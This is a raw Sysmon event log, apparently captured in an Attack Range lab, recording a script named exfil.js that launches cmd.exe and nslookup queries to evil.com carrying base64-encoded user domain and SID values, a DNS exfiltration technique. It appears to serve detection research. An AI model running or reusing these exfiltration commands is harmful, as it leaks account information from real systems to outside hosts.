14:16:28.439{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199558Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.439{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199557Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.439{2E1864BB-17A1-629A-783D-000000005F02}55525352C:\Windows\System32\WScript.exe{2E1864BB-17BC-629A-2040-000000005F02}3596C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199556Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.443{2E1864BB-17BC-629A-2040-000000005F02}3596C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtMjI4ODU1NTg4MC00MjYyODczOTg5LTI1NjQ1NDA1NTgtNTAx evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlfamzw.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199555Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.439{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nltpzrpz.tmpMD5=FB20CB6722435F1F35A02C74A813F0C5,SHA256=8013914F02524B11209965048D9BE8D67580A0B87255186F58E48D3DD646BD34,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199554Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.384{2E1864BB-17BC-629A-1E40-000000005F02}71766576C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-1F40-000000005F02}3796C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199553Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.384{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1F40-000000005F02}3796C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199552Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.384{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199551Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.384{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199550Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.384{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199549Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.384{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199548Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.384{2E1864BB-17BC-629A-1D40-000000005F02}16367224C:\Windows\system32\cmd.exe{2E1864BB-17BC-629A-1F40-000000005F02}3796C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199547Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.389{2E1864BB-17BC-629A-1F40-000000005F02}3796C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-17BC-629A-1D40-000000005F02}1636C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltpzrpz.tmp 2>&1 10341000x8000000000000000199546Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.353{2E1864BB-E13E-6299-1000-000000005F02}3643436C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-1E40-000000005F02}7176C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199545Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.337{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-17BC-629A-1E40-000000005F02}7176C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199544Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.337{2E1864BB-17BC-629A-1E40-000000005F02}71766576C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-1D40-000000005F02}1636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199543Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.322{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1E40-000000005F02}7176C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199542Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.306{2E1864BB-FA28-6299-3207-000000005F02}50322100C:\Windows\system32\csrss.exe{2E1864BB-17BC-629A-1D40-000000005F02}1636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000199541Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.306{2E1864BB-17A1-629A-783D-000000005F02}55521036C:\Windows\System32\WScript.exe{2E1864BB-17BC-629A-1D40-000000005F02}1636C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199540Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.306{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199539Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.306{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199538Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.306{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199537Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.306{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000199536Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.316{2E1864BB-17BC-629A-1D40-000000005F02}1636C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckRvbWFpbjogQVRUQUNLUkFOR0U= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltpzrpz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-17A1-629A-783D-000000005F02}5552C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000199535Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.306{2E1864BB-17A1-629A-783D-000000005F02}5552ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljuts.tmpMD5=F6BF968BD6C55CB01B482E390B7AB413,SHA256=D3302028A36B5DF1F677CB3E99C1E635A1E68F78F1338041C9F2CB6A2C5F113B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000199534Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.268{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=597CD17FA15236A465CF2A00C2F3E249,SHA256=2DD852FDC7AD3376B4318591D93B52E95FC03CF420643B0D567A87A8E22BFBC8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000199533Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.253{2E1864BB-17BC-629A-1B40-000000005F02}57763008C:\Windows\system32\conhost.exe{2E1864BB-17BC-629A-1C40-000000005F02}1676C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199532Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199531Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199530Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:16:28.253{2E1864BB-E13E-6299-0C00-000000005F02}8562300C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000199529Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 